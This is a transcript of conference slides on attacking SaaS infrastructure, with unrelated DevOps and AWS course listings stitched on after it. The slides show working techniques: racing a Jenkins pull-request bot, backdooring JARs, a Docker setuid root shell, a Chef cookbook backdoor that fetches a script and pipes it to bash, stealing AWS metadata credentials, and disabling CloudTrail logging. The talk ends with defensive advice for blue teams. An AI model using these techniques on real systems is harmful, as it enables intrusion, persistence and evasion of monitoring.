Attacking Modern SaaS Companies. Sean Cassidy
|
|
- Harold Richards
- 5 years ago
- Views:
Transcription
1 Attacking Modern SaaS Companies Sean Cassidy
2 Who I am How to Implement Crypto Poorly 2
3 Software-as-a-Service 3
4 Software-as-a-service 4
5 Motivation 5
6 * *Except that it's actually pretty different 6
7 7
8 Goal of this talk Explain how SaaS software is made How we use the cloud And why that's useful for you to know as security/it people This is a huge topic, so this is an introduction Breadth over depth 8
9 The Conclusion 9
10 Access to developer's laptop Config Container Artifact Build NoSQL Cloud Management Server Server API Config DB = Access to everything 10
11 Access to anything = Access to everything 11
12 Why are SaaS companies different? 12
13 How are SaaS Companies Different? Fast, iterative development process Lots of automation Empowered engineers Lots of brand new, powerful tools Lack of security culture 13
14 There are also weaknesses 14
15 Weaknesses of SaaS Companies Linchpin servers Fast, iterative development process But usually not much security monitoring Lots of automation No security strategy or planning Empowered engineers You can use them evil tools Lots of brand new, for powerful Little of to security no budget for security Lack culture 15
16 Building a SaaS Product 16
17 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 17
18 Building a SaaS Product Build Server Continuous Integration builds the code and runs tests 18
19 Continuous Integration 19
20 Continuous Integration Build is triggered Source code is downloaded Source code is compiled Tests are run Software is packaged Uploaded to artifact server 20
21 Here's an example of one way to get in 21
22 Continuous Integration dot slash hack We want to run our code on their Jenkins so that we can backdoor everything it builds 22
23 Continuous Integration dot slash hack Anyone can submit a PR on public Github projects 23
24 Continuous Integration dot slash hack Some people use Jenkins public Github projects 24
25 Continuous Integration dot slash hack If we submit a PR, will it just run our code? 25
26 Continuous Integration dot slash hack 26
27 Continuous Integration dot slash hack 27
28 Continuous Integration dot slash hack " When a new pull request is opened in the project and the author of the pull request isn't whitelisted, builder will ask "Can one of the admins verify this patch?" One of the admins can comment ok to test to accept this pull request for testing, test this please for one time test run and add to whitelist to add the author to the whitelist. 28
29 Continuous Integration dot slash hack Five minutes sounds like polling 29
30 Continuous Integration How GHPRB works 1. Every 5 minutes, poll 2. Find every open pull request 3. Check To see if the author is whitelisted, or The PR is accepted (once or forever) 4. If not, post comment 5. If so, build PR and run tests 30
31 Continuous Integration Work around GHPRB Post innocuous PR that requires running tests Bot will post "Can admin verify?" within 5 minutes Admin user will write "test this please" Within 5 minutes, force push a new malicious commit git commit --amend -a; git push -f Avoid s this! 31
32 Continuous Integration dot slash hack 32
33 Continuous Integration dot slash hack 33
34 Continuous Integration dot slash hack 34
35 Continuous Integration dot slash hack 35
36 Continuous Integration dot slash hack 36
37 What do you do if you get shell on Jenkins? 37
38 Backdooring Jenkins We can read/write to any file Jenkins controls jenkins:~$ ls -al -rw-r--r-- 1 jenkins jenkins -rw-r--r-- 1 jenkins jenkins drwxr-xr-x 2 jenkins jenkins drwx jenkins jenkins drwxr-xr-x 2 jenkins jenkins drwxr-xr-x 2 jenkins jenkins drwxr-xr-x 4 jenkins jenkins drwxr-xr-x 4 jenkins jenkins Apr Mar Apr Mar Apr Mar Mar Mar :24 23:31 19:59 19:11 21:16 23:32 19:14 19:13 config.xml credentials.xml.m2 secrets updates usercontent users workspace 38
39 Backdooring Jenkins JARs You don't need the actual class. Same classpath and signature is enough package hacked; import victim.myclass; public class Hacked { public static void main(string...args) { System.out.println("hacked!"); MyClass.main(args); } } 39
40 Backdooring Jenkins JARs $ echo "Main-class: hacked.hacked" > addition $ jar uf victim.jar hacked/ $ jar umf addition victim.jar $ java -jar victim.jar Hacked! 40
41 41
42 Continuous Integration dot slash hack There's loads more you can do with this See Jonathan Claudius's 2013 talk: "Attacking Cloud Services with Source Code" 42
43 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 43
44 Deployment 44
45 Deployment LXC (Docker, CoreOS, etc.) Virtualized OS with all dependencies included CI will usually build the entire image Configuration management software Chef Puppet Ansible, etc. Custom Scripts 45
46 Security Pitfalls Easy Docker Root Shell If the user is in the docker group, they can run containers without sudo $ docker run -v /home/${user}:/h_docs ubuntu \ bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" $ ls -la rootshell -rwsrwxrwx 1 root root Apr 17 rootshell $ ~/rootshell -p # whoami root Source: Zachary Keeton 46
47 47
48 48
49 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 49
50 Config Management 50
51 Configuration Management Your software depends on ntpd running and the time being correct Recent Linux kernel version imagemagick installed Are all 175 nodes up to date? Do they have these packages installed? How do you peer review and approve changes? 51
52 Configuration Management Chef Infrastructure as code Describe what, not how directory '/opt/application/config' do owner 'service' mode '0750' action :create recursive true end 52
53 Configuration Management Chef and Knife Knife is the CLI to interact with Chef ~/.chef/knife.rb Where the Chef server is ~/.chef/user.pem The private RSA key for Knife 53
54 Chef For the attacker List of every node in every environment knife node list Installed packages for every machine knife search "*" -a packages Kernel version knife search "*" -a kernel.release Secrets knife search "*" -l grep password 54
55 Chef For the attacker Find more data knife data bag list knife data bag show ssl certs Run arbitrary SSH commands knife ssh "*" COMMAND This will prompt for SSH auth 55
56 Chef Backdooring everything knife search "*" -a recipes sort uniq -c sort -n -r head 106 zsh::default 106 sysstat::default 106 sudo::default 106 slack_handler::default 106 slack::default 56
57 Chef Backdooring everything knife cookbook download zsh cat backdoor.rb >> zsh/recipe/default.rb knife cookbook upload zsh cat backdoor.rb bash 'backdoor' do code <<-EOF wget bash bad.sh EOF end 57
58 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 58
59 Provisioning 59
60 Provisioning The web console Slow, inaccurate, hard to review changes CLI aws ec2 run-instance --image-id someid Provisioning CloudFormation OpenStack Heat Terraform 60
61 Terraform resource "aws_instance" "web" { instance_type = "t2.micro" ami = "some_ami_id" subnet_id = "${aws_subnet.default.id}" } $ terraform plan $ terraform apply 61
62 Scary! $ terraform destroy -force This can be mitigated by Auto-scaling groups Restricting permissions 62
63 Provisioning Pitfalls If you can run provisioning commands or scripts, you can do (almost) anything Continuous integration usually runs provisioning If you're really bold, just check in your backdoor 63
64 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 64
65 65
66 The Cloud Access Keys Key: ASIAXD5KAAKA8WW3T029 Secret: jd5mdxiztfuvr+doq/ltklt8bml7nwzbnxh8rvaiko4 ml3/4nq/yk 66
67 The Cloud Access Keys Find them baked into application's config Developer's machines or Jenkins ~/.aws/credentials Sometimes committed to source control and then reverted git rev-list --all xargs git grep 'A[A-Z0-9]{19}' 67
68 68
69 The Cloud Roles Avoid baking in keys: use roles! No keys, the node itself is authorized Ex: prod-file-uploader-role PUT to S3 prod-account-service-role Create new IAM roles with custom policies Create new S3 buckets 69
70 How else can you get access keys? (AWS) some-ec2-node $ curl -s /iam/security-credentials/ prod-file-uploader-role some-ec2-node $ curl -s /iam/security-credentials /prod-file-uploader-role 70
71 How else can you get access keys? (AWS) some-ec2-node $ curl -s /iam/security-credentials /prod-file-uploader-role { "AccessKeyId": "ASIAXD5KAAKA8WW3T029" "SecretAccessKey": "KJidf3k209/kq3wJXz1j.." "Token": "DS2jja09tiyBn/////////ajd31JEw.." } 71
72 AWS Access Keys from AWS Roles Keys works outside of that instance and VPC Valid for up to an hour Need all three parts to work: $ export AWS_ACCESS_KEY_ID=ASIAXD5KAAKA8WW3T029 $ export AWS_SECRET_ACCESS_KEY=KJidf3k209/kq3wJXz1j.. $ export AWS_SESSION_TOKEN=DS2jja09tiyBn/////////ajd31.. Then you can do whatever that role can do $ aws ec2 describe-instances $ aws ec2 terminate-instances --instance-ids... 72
73 What can the EC2 Instance Metadata API do? some-ec2-node $ curl -s /instance-identity/document/ { "privateip" : " ", "availabilityzone" : "us-east-1a", "instanceid" : "i-19c466fde3aba901a", "instancetype" : "t2.small", "accountid" : " ", "imageid" : "ami-3eb083aa", } 73
74 What can the EC2 Instance Metadata API do? some-ec2-node $ curl -s #!/bin/bash # # Bootstrap script for EC2 #... code here, maybe passwords, secrets, etc. 74
75 The Cloud Logs 75
76 Cloud Logs Disrupting Logging aws cloudtrail delete-trail --name CloudTrail aws cloudtrail stop-logging --name CloudTrail aws cloudtrail update-trail --name CloudTrail --no-is-multi-region-trail --no-include-global-service-events aws s3 rb --force s3://my-cloudtrail-bucket S3 lifecycle rule to delete logs after 1 second Encrypt the logs with a key the company doesn't have Source: Daniel Grzelak 76
77 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 77
78 Backdoors 78
79 AWS Remote Access Tool How do you persist your compromise of AWS? If you just use a user with credentials, those users and credentials are often audited If you start an EC2 instance, that costs money, very visible What to do instead? 79
80 AWS RAT Lambda Serverless computing Upload code, don't run servers Underutilized feature Free tier eligible Can assign a role to the lambda Roles are less often audited than Users Deploy in a region that they don't use 80
81 AWS RAT Long-evans Optionally disables CloudTrail logging Provisions admin account for itself Installs innocuous Lambda Run it and see if your logging alerts or not 81
82 82
83 Blue Team 83
84 Advice for Blue Team Restrict direct developer access Automate everything Don't use the web console or CLI Continuous integration and monitoring is essential Peer review Choose new tech carefully What happens if X is compromised? 84
85 Advice for Blue Team Multiple Accounts Use Roles Isolate business and functional units Minimizes blast radius Reduce compliance and regulatory surface area Centrally manage and monitor many teams More information: aws-multi-account-security-strategy/ 85
86 Cloud Logs What to alert on New access keys New provisioned users/roles/groups New instances/lambdas Suspicious Console Logins Disruption of logging And much more! 86
87 Thanks! Website:
AALOK INSTITUTE. DevOps Training
DevOps Training Duration: 40Hrs (8 Hours per Day * 5 Days) DevOps Syllabus 1. What is DevOps? a. History of DevOps? b. How does DevOps work anyways? c. Principle of DevOps: d. DevOps combines the best
More informationAre You Sure Your AWS Cloud Is Secure? Alan Williamson Solution Architect at TriNimbus
Are You Sure Your AWS Cloud Is Secure? Alan Williamson Solution Architect at TriNimbus 1 60 Second AWS Security Review 2 AWS Terminology Identity and Access Management (IAM) - AWS Security Service to manage
More informationDEVOPS COURSE CONTENT
LINUX Basics: Unix and linux difference Linux File system structure Basic linux/unix commands Changing file permissions and ownership Types of links soft and hard link Filter commands Simple filter and
More informationDevOps Course Content
DevOps Course Content 1. Introduction: Understanding Development Development SDLC using WaterFall & Agile Understanding Operations DevOps to the rescue What is DevOps DevOps SDLC Continuous Delivery model
More informationAWS Course Syllabus. Linux Fundamentals. Installation and Initialization:
AWS Course Syllabus Linux Fundamentals Installation and Initialization: Installation, Package Selection Anatomy of a Kickstart File, Command line Introduction to Bash Shell System Initialization, Starting
More informationSecurity Camp 2016 Cloud Security. August 18, 2016
Security Camp 2016 Cloud Security What I ll be discussing Cloud Security Topics Cloud overview The VPC and structures Cloud Access Methods Who owns your data? Cover your Cloud trail? Protection approaches
More informationManaging and Auditing Organizational Migration to the Cloud TELASA SECURITY
Managing and Auditing Organizational Migration to the Cloud 1 TELASA SECURITY About Me Brian Greidanus bgreidan@telasasecurity.com 18+ years of security and compliance experience delivering consulting
More informationSimple Security for Startups. Mark Bate, AWS Solutions Architect
BERLIN Simple Security for Startups Mark Bate, AWS Solutions Architect Agenda Our Security Compliance Your Security Account Management (the keys to the kingdom) Service Isolation Visibility and Auditing
More informationAdvanced Continuous Delivery Strategies for Containerized Applications Using DC/OS
Advanced Continuous Delivery Strategies for Containerized Applications Using DC/OS ContainerCon @ Open Source Summit North America 2017 Elizabeth K. Joseph @pleia2 1 Elizabeth K. Joseph, Developer Advocate
More informationNetflix OSS Spinnaker on the AWS Cloud
Netflix OSS Spinnaker on the AWS Cloud Quick Start Reference Deployment August 2016 Huy Huynh and Tony Vattathil Solutions Architects, Amazon Web Services Contents Overview... 2 Architecture... 3 Prerequisites...
More informationQuick Install for Amazon EMR
Quick Install for Amazon EMR Version: 4.2 Doc Build Date: 11/15/2017 Copyright Trifacta Inc. 2017 - All Rights Reserved. CONFIDENTIAL These materials (the Documentation ) are the confidential and proprietary
More informationContents. Note: pay attention to where you are. Note: Plaintext version. Note: pay attention to where you are... 1 Note: Plaintext version...
Contents Note: pay attention to where you are........................................... 1 Note: Plaintext version................................................... 1 Hello World of the Bash shell 2 Accessing
More informationBest Practices for Cloud Security at Scale. Phil Rodrigues Security Solutions Architect Amazon Web Services, ANZ
Best Practices for Cloud Security at Scale Phil Rodrigues Security Solutions Architect Web Services, ANZ www.cloudsec.com #CLOUDSEC Best Practices for Security at Scale Best of the Best tips for Security
More informationDriving DevOps Transformation in Enterprises
Driving DevOps Transformation in Enterprises Mark Rambow Software Development Manager, AWS OpsWorks, Berlin acts_as_enterprisey start up enterprises enterprises and monolith software DevOps Drive securely
More informationAmazon Web Services. Block 402, 4 th Floor, Saptagiri Towers, Above Pantaloons, Begumpet Main Road, Hyderabad Telangana India
(AWS) Overview: AWS is a cloud service from Amazon, which provides services in the form of building blocks, these building blocks can be used to create and deploy various types of application in the cloud.
More informationArchitecting for Greater Security in AWS
Architecting for Greater Security in AWS Jonathan Desrocher Security Solutions Architect, Amazon Web Services. Guy Tzur Director of Ops, Totango. 2015, Amazon Web Services, Inc. or its affiliates. All
More informationCloud security 2.0: Joko nyt pilveen voi luottaa?
Cloud security 2.0: Joko nyt pilveen voi luottaa? www.nordcloud.com 11 04 2017 Helsinki 2 Teemu Lehtonen Senior Cloud architect, Security teemu.lehtonen@nordcloud.com +358 40 6329445 Nordcloud Finland
More informationDevOps Agility in the Evolving Cloud Services Landscape
DevOps Agility in the Evolving Cloud Services Landscape Kiran Chitturi CTO Architect, Sungard Availability Services @nkchitturi Kiran Chitturi Architect in the Office of the CTO Focus on DevOps and cloud
More informationSwift Web Applications on the AWS Cloud
Swift Web Applications on the AWS Cloud Quick Start Reference Deployment November 2016 Asif Khan, Tom Horton, and Tony Vattathil Solutions Architects, Amazon Web Services Contents Overview... 2 Architecture...
More informationHashiCorp Vault on the AWS Cloud
HashiCorp Vault on the AWS Cloud Quick Start Reference Deployment November 2016 Last update: April 2017 (revisions) Cameron Stokes, HashiCorp, Inc. Tony Vattathil and Brandon Chavis, Amazon Web Services
More informationIntroduction to AWS GoldBase. A Solution to Automate Security, Compliance, and Governance in AWS
Introduction to AWS GoldBase A Solution to Automate Security, Compliance, and Governance in AWS September 2015 2015, Amazon Web Services, Inc. or its affiliates. All rights reserved. Notices This document
More informationTM DevOps Use Case TechMinfy All Rights Reserved
Document Details Use Case Name TMDevOps Use Case01 First Draft 5 th March 2018 Author Reviewed By Prabhakar D Pradeep Narayanaswamy Contents Scope... 4 About Customer... 4 Use Case Description... 4 Primary
More informationSecuring Microservices Containerized Security in AWS
Securing Microservices Containerized Security in AWS Mike Gillespie, Solutions Architect, Amazon Web Services Splitting Monoliths Ten Years Ago Splitting Monoliths Ten Years Ago XML & SOAP Splitting Monoliths
More informationAutomate All The Things. Software Defined Infrastructure with AWS CloudFormation, Docker and Jenkins
Automate All The Things Software Defined Infrastructure with AWS CloudFormation, Docker and Jenkins Mark Fischer 20 Years of Web Application Development 5 Years of Infrastructure Tools Development 2 Years
More information70-532: Developing Microsoft Azure Solutions
70-532: Developing Microsoft Azure Solutions Exam Design Target Audience Candidates of this exam are experienced in designing, programming, implementing, automating, and monitoring Microsoft Azure solutions.
More informationDevOps Foundations : Infrastructure as Code
DevOps Foundations : Infrastructure as Code Ernest Mueller, James Wickett DevOps Fundamentals 1 1. Infrasturcture automation 2. Continuous Delivery 3. Reliability Engineering Infrastructure as Code There
More informationSeven Habits of Highly Effective Jenkins Users
Seven Habits of Highly Effective Jenkins Users What is this talk about? Lessons learned: Maintaining multiple large Jenkins instances. Working on Jenkins itself, and many of its plugins. Seeing customer
More informationIdentity Management and Compliance in OpenShift
Identity Management and Compliance in OpenShift Or Use DevOps to Make Your Auditors and Suits Happy Marc Boorshtein CTO, Tremolo Security Ellen Newlands Senior Security Product Manager, Cloud Business
More information70-532: Developing Microsoft Azure Solutions
70-532: Developing Microsoft Azure Solutions Objective Domain Note: This document shows tracked changes that are effective as of January 18, 2018. Create and Manage Azure Resource Manager Virtual Machines
More informationAspirin as a Service: Using the Cloud to Cure Security Headaches
SESSION ID: CSV-T10 Aspirin as a Service: Using the Cloud to Cure Security Headaches Bill Shinn Principle Security Solutions Architect Amazon Web Services Rich Mogull CEO Securosis @rmogull Little. Cloudy.
More informationThis tutorial provides a basic understanding of the infrastructure and fundamental concepts of managing an infrastructure using Chef.
About the Tutorial Chef is a configuration management technology developed by Opscode to manage infrastructure on physical or virtual machines. It is an open source developed using Ruby, which helps in
More informationAt Course Completion Prepares you as per certification requirements for AWS Developer Associate.
[AWS-DAW]: AWS Cloud Developer Associate Workshop Length Delivery Method : 4 days : Instructor-led (Classroom) At Course Completion Prepares you as per certification requirements for AWS Developer Associate.
More informationWho done it: Gaining visibility and accountability in the cloud
Who done it: Gaining visibility and accountability in the cloud By Ryan Nolette Squirrel Edition $whoami 10+ year veteran of IT, Security Operations, Threat Hunting, Incident Response, Threat Research,
More informationAWS Remote Access VPC Bundle
AWS Remote Access VPC Bundle Deployment Guide Last updated: April 11, 2017 Aviatrix Systems, Inc. 411 High Street Palo Alto CA 94301 USA http://www.aviatrix.com Tel: +1 844.262.3100 Page 1 of 12 TABLE
More informationCloud Catastrophes. and how to avoid them
Cloud Catastrophes and how to avoid them Who? Mike Haworth Nope Works for: Insomnia Security Bio: Extensive biographical information Extensive biographical information Extensive biographical information
More informationAnsible Tower Quick Setup Guide
Ansible Tower Quick Setup Guide Release Ansible Tower 2.4.5 Red Hat, Inc. Jun 06, 2017 CONTENTS 1 Quick Start 2 2 Login as a Superuser 3 3 Import a License 4 4 Examine the Tower Dashboard 6 5 The Setup
More informationSecurity as Code: The Time is Now. Dave Shackleford Founder, Voodoo Security Sr. Instructor, SANS
Security as Code: The Time is Now Dave Shackleford Founder, Voodoo Security Sr. Instructor, SANS Introduction Business is moving faster to the cloud, and DevOps is accelerating scale and pushing automation
More informationAWS London Loft: CloudFormation Workshop
AWS London Loft: CloudFormation Workshop Templated AWS Resources Tom Maddox Solutions Architect tmaddox@amazon.co.uk Who am I? Gardener (Capacity Planning) Motorcyclist (Agility) Mobile App Writer Problem
More informationContainers: Exploits, Surprises, And Security
Containers: Exploits, Surprises, And Security with Elissa Shevinsky COO at SoHo Token Labs Editor of Lean Out #RVASec @ElissaBeth on twitter @Elissa_is_offmessage on Instagram this was Silicon Valley in
More informationTM DevOps Use Case. 2017TechMinfy All Rights Reserved
Document Details Use Case Name TMDevOps Use Case04 First Draft 10 th Dec 2017 Author Reviewed By Amrendra Kumar Pradeep Narayanaswamy Contents Scope... 4 About Customer... 4 Pre-Conditions/Trigger... 4
More informationCPM. Quick Start Guide V2.4.0
CPM Quick Start Guide V2.4.0 1 Content 1 Introduction... 3 Launching the instance... 3 CloudFormation... 3 CPM Server Instance Connectivity... 3 2 CPM Server Instance Configuration... 4 CPM Server Configuration...
More informationSecurity & Compliance in the AWS Cloud. Vijay Rangarajan Senior Cloud Architect, ASEAN Amazon Web
Security & Compliance in the AWS Cloud Vijay Rangarajan Senior Cloud Architect, ASEAN Amazon Web Services @awscloud www.cloudsec.com #CLOUDSEC Security & Compliance in the AWS Cloud TECHNICAL & BUSINESS
More informationAutomating Elasticity. March 2018
Automating Elasticity March 2018 2018, Amazon Web Services, Inc. or its affiliates. All rights reserved. Notices This document is provided for informational purposes only. It represents AWS s current product
More informationHandel-CodePipeline Documentation
Handel-CodePipeline Documentation Release 0.0.6 David Woodruff Dec 11, 2017 Getting Started 1 Introduction 3 2 Installation 5 3 Tutorial 7 4 Using Handel-CodePipeline 11 5 Handel-CodePipeline File 13
More informationLabs Workbench on AWS
Labs Workbench on AWS Features Free Tier Manual Instance Deployment Gotchas Potential Problems Prerequisites (for all) Deploying via kube-up.sh Setup Teardown Deploying a Production Cluster via kops Installation
More informationLB Cache Quick Start Guide v1.0
LB Cache Quick Start Guide v1.0 Rev. 1.1.0 Copyright 2002 2017 Loadbalancer.org, Inc Table of Contents Introduction...3 About LBCache...3 Amazon Terminology...3 Getting Started...3 Deployment Concepts...4
More informationSecurity & Compliance in the AWS Cloud. Amazon Web Services
Security & Compliance in the AWS Cloud Amazon Web Services Our Culture Simple Security Controls Job Zero AWS Pace of Innovation AWS has been continually expanding its services to support virtually any
More informationInstalling and Using Docker Toolbox for Mac OSX and Windows
Installing and Using Docker Toolbox for Mac OSX and Windows One of the most compelling reasons to run Docker on your local machine is the speed at which you can deploy and build lab environments. As a
More informationAWS FREQUENTLY ASKED QUESTIONS (FAQ)
UCPATH @ AWS FREQUENTLY ASKED QUESTIONS (FAQ) ARCHITECTURE WHAT WILL CHANGE DURING THIS MOVE TO AWS? All environments use a standardized format using Cloud Formation Scripts. They are also all encapsulated
More informationAWS Solution Architect Associate
AWS Solution Architect Associate 1. Introduction to Amazon Web Services Overview Introduction to Cloud Computing History of Amazon Web Services Why we should Care about Amazon Web Services Overview of
More informationCASE STUDY Application Migration and optimization on AWS
CASE STUDY Application Migration and optimization on AWS Newt Global Consulting LLC. AMERICAS INDIA HQ Address: www.newtglobal.com/contactus 2018 Newt Global Consulting. All rights reserved. Referred products/
More informationCONTINUOUS INTEGRATION; TIPS & TRICKS
CONTINUOUS INTEGRATION; TIPS & TRICKS BIO I DO TECH THINGS I DO THINGS I DO THINGS BLUE OCEAN BEEP BEEP REFACTOR PEOPLE S HOUSES MY TIPS & TRICKS FOR CI - CI Infrastructure - CI Architecture - Pipeline
More informationArcGIS 10.3 Server on Amazon Web Services
ArcGIS 10.3 Server on Amazon Web Services Copyright 1995-2016 Esri. All rights reserved. Table of Contents Introduction What is ArcGIS Server on Amazon Web Services?............................... 5 Quick
More informationIntroduction to cloud computing
Introduction to cloud computing History of cloud Different vendors of Cloud computing Importance of cloud computing Advantages and disadvantages of cloud computing Cloud deployment methods Private cloud
More informationOBSERVEIT CLOUDTHREAT GUIDE
OBSERVEIT CLOUDTHREAT GUIDE Contents 1 About This Document... 2 1.1 Intended Audience... 2 1.2 Related ObserveIT Software and Documentation... 2 1.3 Support... 2 2 Product Overview... 3 3 Installing the
More informationSecuring Serverless Architectures
Securing Serverless Architectures Dave Walker, Specialist Solutions Architect, Security and Compliance Berlin 12/04/16 2016, Web Services, Inc. or its Affiliates. All rights reserved. With Thanks To: Agenda
More informationRoles. Ecosystem Flow of Information between Roles Accountability
Roles Ecosystem Flow of Information between Roles Accountability Role Definitions Role Silo Job Tasks Compute Admin The Compute Admin is responsible for setting up and maintaining the physical and virtual
More informationDeploy and Secure an Internet Facing Application with the Barracuda Web Application Firewall in Amazon Web Services
Deploy and Secure an Internet Facing Application with the in Amazon Web In this lab, you will deploy an unsecure web application into Amazon Web (AWS), and then secure the application using the. To create
More informationDeployment Patterns using Docker and Chef
Deployment Patterns using Docker and Chef Sandeep Chellingi Sandeep.chellingi@prolifics.com Agenda + + Rapid Provisioning + Automated and Managed Deployment IT Challenges - Use-cases What is Docker? What
More informationAccelerate at DevOps Speed With Openshift v3. Alessandro Vozza & Samuel Terburg Red Hat
Accelerate at DevOps Speed With Openshift v3 Alessandro Vozza & Samuel Terburg Red Hat IT (R)Evolution Red Hat Brings It All Together What is Kubernetes Open source container cluster manager Inspired by
More informationDeploying an Active Directory Forest
Deploying an Active Directory Forest Introduction Wow, it is amazing how time flies. Almost two years ago, I wrote a set of blogs that showed how one can use Azure Resource Manager (ARM) templates and
More informationHTTP request proxying vulnerability
HTTP request proxying vulnerability andres@laptop:~/$ curl http://twitter.com/?url=http://httpbin.org/useragent { "user-agent": "python-requests/1.2.3 CPython/2.7.3 Linux/3.2.0-48virtual" } andres@laptop:~/$
More informationSecurity: Michael South Americas Regional Leader, Public Sector Security & Compliance Business Acceleration
Security: A Driving Force Behind Moving to the Cloud Michael South Americas Regional Leader, Public Sector Security & Compliance Business Acceleration 2017, Amazon Web Services, Inc. or its affiliates.
More informationTraining on Amazon AWS Cloud Computing. Course Content
Training on Amazon AWS Cloud Computing Course Content 15 Amazon Web Services (AWS) Cloud Computing 1) Introduction to cloud computing Introduction to Cloud Computing Why Cloud Computing? Benefits of Cloud
More informationTutorial 1. Account Registration
Tutorial 1 /******************************************************** * Author : Kai Chen * Last Modified : 2015-09-23 * Email : ck015@ie.cuhk.edu.hk ********************************************************/
More informationRelease Pipelines in Microsoft Ecosystems
Release Pipelines in Microsoft Ecosystems Warren Frame, Harvard University Michael Greene, Microsoft December 4 9, 2016 Boston, MA www.usenix.org/lisa16 #lisa16 whoami Warren Frame Research Computing at
More informationWe are ready to serve Latest IT Trends, Are you ready to learn? New Batches Info
We are ready to serve Latest IT Trends, Are you ready to learn? New Batches Info START DATE : TIMINGS : DURATION : TYPE OF BATCH : FEE : FACULTY NAME : LAB TIMINGS : Storage & Database Services : Introduction
More informationDetecting Credential Compromise in AWS
Detecting Credential Compromise in AWS William Bengtson Senior Security Engineer, Netflix Credential compromise is an important concern for anyone operating in the cloud. The concerns become more widespread
More informationServerless Website Publishing with AWS Code* Services. Steffen Grunwald Solutions Architect, AWS October 27, 2016
Serverless Website Publishing with AWS Code* Services Steffen Grunwald Solutions Architect, AWS October 27, 2016 Software Delivery Models evolved What do you need to move fast? Re-use services, Architect
More informationKubeNow Documentation
KubeNow Documentation Release 0.3.0 mcapuccini Dec 13, 2017 Getting Started 1 Prerequisites 3 1.1 Install Docker.............................................. 3 1.2 Get KubeNow..............................................
More informationExploring UNIX: Session 3
Exploring UNIX: Session 3 UNIX file system permissions UNIX is a multi user operating system. This means several users can be logged in simultaneously. For obvious reasons UNIX makes sure users cannot
More informationLINUX, WINDOWS(MCSE),
Virtualization Foundation Evolution of Virtualization Virtualization Basics Virtualization Types (Type1 & Type2) Virtualization Demo (VMware ESXi, Citrix Xenserver, Hyper-V, KVM) Cloud Computing Foundation
More informationTitle: Planning AWS Platform Security Assessment?
Title: Planning AWS Platform Security Assessment? Name: Rajib Das IOU: Cyber Security Practices TCS Emp ID: 231462 Introduction Now-a-days most of the customers are working in AWS platform or planning
More informationAgile CI/CD with Jenkins and/at ZeroStack. Kiran Bondalapati CTO, Co-Founder & Jenkins Admin ZeroStack, Inc. (
Agile CI/CD with Jenkins and/at ZeroStack Kiran Bondalapati CTO, Co-Founder & Jenkins Admin ZeroStack, Inc. (www.zerostack.com) Outline ZeroStack Hybrid Cloud Platform Jenkins and ZeroStack Jenkins at
More informationLab 5: Working with REST APIs
Lab 5: Working with REST APIs Oracle's Autonomous Transaction Processing cloud service provides all of the performance of the market-leading Oracle Database in an environment that is tuned and optimized
More informationDatabricks Enterprise Security Guide
Databricks Enterprise Security Guide 1 Databricks is committed to building a platform where data scientists, data engineers, and data analysts can trust that their data is secure. Through implementing
More informationAWS Security. Staying on Top of the Cloud
AWS Security Staying on Top of the Cloud Intro Kurtis Miller, a Principal Security Consultant for Previously: Global Security Engineering Manager for Senior Security Consultant for First Security Engineer
More informationAmazon Web Services (AWS) Solutions Architect Intermediate Level Course Content
Amazon Web Services (AWS) Solutions Architect Intermediate Level Course Content Introduction to Cloud Computing A Short history Client Server Computing Concepts Challenges with Distributed Computing Introduction
More informationPuppet on the AWS Cloud
Puppet on the AWS Cloud Quick Start Reference Deployment AWS Quick Start Reference Team March 2016 This guide is also available in HTML format at http://docs.aws.amazon.com/quickstart/latest/puppet/. Contents
More informationCSC209. Software Tools and Systems Programming. https://mcs.utm.utoronto.ca/~209
CSC209 Software Tools and Systems Programming https://mcs.utm.utoronto.ca/~209 What is this Course About? Software Tools Using them Building them Systems Programming Quirks of C The file system System
More informationLinux System Management with Puppet, Gitlab, and R10k. Scott Nolin, SSEC Technical Computing 22 June 2017
Linux System Management with Puppet, Gitlab, and R10k Scott Nolin, SSEC Technical Computing 22 June 2017 Introduction I am here to talk about how we do Linux configuration management at the Space Science
More informationDevOps Anti-Patterns. Have the Ops team deal with it. Time to fire the Ops team! Let s hire a DevOps unit! COPYRIGHT 2019 MANICODE SECURITY
DevOps Anti-Patterns Have the Ops team deal with it. Time to fire the Ops team! Let s hire a DevOps unit! 31 Anti-Pattern: Throw it Over the Wall Development Operations 32 Anti-Pattern: DevOps Team Silo
More informationAlliance Key Manager AKM for AWS Quick Start Guide. Software version: Documentation version:
Alliance Key Manager AKM for AWS Quick Start Guide Software version: 4.0.0 Documentation version: 4.0.0.002 Townsend Security www.townsendsecurity.com 800.357.1019 +1 360.359.4400 Alliance Key Manager
More informationNET1821BU THE FUTURE OF NETWORKING AND SECURITY WITH NSX-T Bruce Davie CTO, APJ 2
NET1821BU The Future of Network Virtualization with NSX-T #VMworld #NET1821BU NET1821BU THE FUTURE OF NETWORKING AND SECURITY WITH NSX-T Bruce Davie CTO, APJ 2 DISCLAIMER This presentation may contain
More informationMOBILE APP FOR ACME INC. by Sean Hull - Cloud Solutions Architect -
MOBILE APP FOR ACME INC. by Sean Hull - Cloud Solutions Architect - sean@iheavy.com ABOUT SEAN HULL +1-917-442-3939 sean@iheavy.com iheavy.com/blog about.me/hullsean github.com/hullsean NEWSLETTER - SIGNUP!
More informationUSING NGC WITH GOOGLE CLOUD PLATFORM
USING NGC WITH GOOGLE CLOUD PLATFORM DU-08962-001 _v02 April 2018 Setup Guide TABLE OF CONTENTS Chapter 1. Introduction to... 1 Chapter 2. Deploying an NVIDIA GPU Cloud Image from the GCP Console...3 2.1.
More informationAWS Reference Design Document
AWS Reference Design Document Contents Overview... 1 Amazon Web Services (AWS), Public Cloud and the New Security Challenges... 1 Security at the Speed of DevOps... 2 Securing East-West and North-South
More informationAdopting Modern Practices for Improved Cloud Security. Cox Automotive - Enterprise Risk & Security
Adopting Modern Practices for Improved Cloud Security Cox Automotive - Enterprise Risk & Security 1 About Cox Automotive Cox Automotive is a leading provider of products and services that span the automotive
More informationepldt Web Builder Security March 2017
